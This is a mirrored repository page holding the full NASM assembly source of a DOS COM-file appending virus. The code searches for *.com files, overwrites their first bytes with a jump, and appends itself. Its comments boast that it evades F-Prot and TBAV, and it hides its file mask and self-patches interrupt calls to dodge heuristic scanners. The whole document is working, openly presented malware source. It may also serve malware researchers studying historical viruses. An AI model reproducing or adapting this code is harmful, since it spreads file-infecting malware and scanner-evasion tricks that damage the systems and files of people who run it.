mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 20:35:25 +00:00
120 lines
2.7 KiB
NASM
120 lines
2.7 KiB
NASM
|
;
|
||
|
; Simple com appender destined to be another SillyC
|
||
|
; so im putting the file name in as the virus name .. nuff said
|
||
|
;
|
||
|
; Unscannable by F-Prot & by TBAV with no flags
|
||
|
; Uses a novel way of beating S flag
|
||
|
;
|
||
|
; Scans as a VCL/IVP variant with AVP/DSAV
|
||
|
;
|
||
|
.model tiny
|
||
|
.code
|
||
|
org 100h
|
||
|
begin:
|
||
|
db 0E9h
|
||
|
dw offset start-103h
|
||
|
start:
|
||
|
call delta
|
||
|
delta:
|
||
|
pop bp
|
||
|
sub bp,offset delta
|
||
|
and word ptr [begin],0
|
||
|
and byte ptr [begin+2],0
|
||
|
or ah,[old_bytes+bp]
|
||
|
or al,[old_bytes+bp+1]
|
||
|
or bh,[old_bytes+bp+2]
|
||
|
or byte ptr [begin],ah
|
||
|
or byte ptr [begin+1],al
|
||
|
or byte ptr [begin+2],bh
|
||
|
and byte ptr [f_string+bp],7Fh
|
||
|
and byte ptr [f_string+bp+1],7Fh
|
||
|
and byte ptr [f_string+bp+2],7Fh
|
||
|
and byte ptr [f_string+bp+3],7Fh
|
||
|
and byte ptr [f_string+bp+4],7Fh
|
||
|
mov dh,1ah
|
||
|
lea ax,[bp+offset dta]
|
||
|
xchg ax,dx
|
||
|
int 21h
|
||
|
mov dh,4eh
|
||
|
find_next:
|
||
|
xor cx,cx
|
||
|
lea ax,[bp+offset f_string]
|
||
|
xchg ax,dx
|
||
|
int 21h
|
||
|
jc done2
|
||
|
mov cl,[dta+1ah+bp]
|
||
|
mov ch,[dta+1bh+bp]
|
||
|
sub cx,3
|
||
|
mov [new_bytes+1+bp],cl
|
||
|
mov [new_bytes+2+bp],ch
|
||
|
mov dx,3D02h
|
||
|
lea ax,[bp+offset dta+1Eh]
|
||
|
xchg ax,dx
|
||
|
int 21h
|
||
|
xchg ax,bx
|
||
|
mov dh,3fh
|
||
|
mov cx,3
|
||
|
lea ax,[bp+offset old_bytes]
|
||
|
xchg ax,dx
|
||
|
int 21h
|
||
|
cmp [bp+old_bytes],0E9h
|
||
|
jne okay
|
||
|
mov ah,3eh
|
||
|
int 21h
|
||
|
mov dh,4fh
|
||
|
jmp find_next
|
||
|
done2:
|
||
|
jmp done
|
||
|
okay:
|
||
|
mov dx,4200h
|
||
|
xor cx,cx
|
||
|
xor ax,ax
|
||
|
xchg ax,dx
|
||
|
int 21h
|
||
|
mov dh,40h
|
||
|
mov cx,3
|
||
|
lea ax,[bp+offset new_bytes]
|
||
|
xchg ax,dx
|
||
|
and byte ptr [n1+bp+1],7fh
|
||
|
n1:
|
||
|
int 0A1h
|
||
|
mov byte ptr [n1+bp+1],0A1h
|
||
|
mov dx,4202h
|
||
|
xor cx,cx
|
||
|
xor ax,ax
|
||
|
xchg ax,dx
|
||
|
int 21h
|
||
|
mov dh,40h
|
||
|
mov cx, offset theend - offset start + 56
|
||
|
or byte ptr [f_string+bp],80h
|
||
|
or byte ptr [f_string+bp+1],80h
|
||
|
or byte ptr [f_string+bp+2],80h
|
||
|
or byte ptr [f_string+bp+3],80h
|
||
|
or byte ptr [f_string+bp+4],80h
|
||
|
lea ax,[bp+offset start]
|
||
|
xchg ax,dx
|
||
|
and byte ptr [n2+bp+1],7fh
|
||
|
n2:
|
||
|
int 0A1h
|
||
|
mov ah,3Eh
|
||
|
int 21h
|
||
|
done:
|
||
|
mov ax,101h
|
||
|
xor bx,bx
|
||
|
xchg ax,bx
|
||
|
xor cx,cx
|
||
|
dec bx
|
||
|
xor dx,dx
|
||
|
push bx
|
||
|
xor bp,bp
|
||
|
xor bx,bx
|
||
|
ret
|
||
|
;danke db 'Nightwak'
|
||
|
theend:
|
||
|
.data
|
||
|
old_bytes db 0c3h,90h,90h
|
||
|
new_bytes db 0E9h, 2 dup (0)
|
||
|
dta db 42 dup(0)
|
||
|
f_string db '*'+80h,'.'+80h,'c'+80h,'o'+80h,'m'+80h,0,0
|
||
|
end begin
|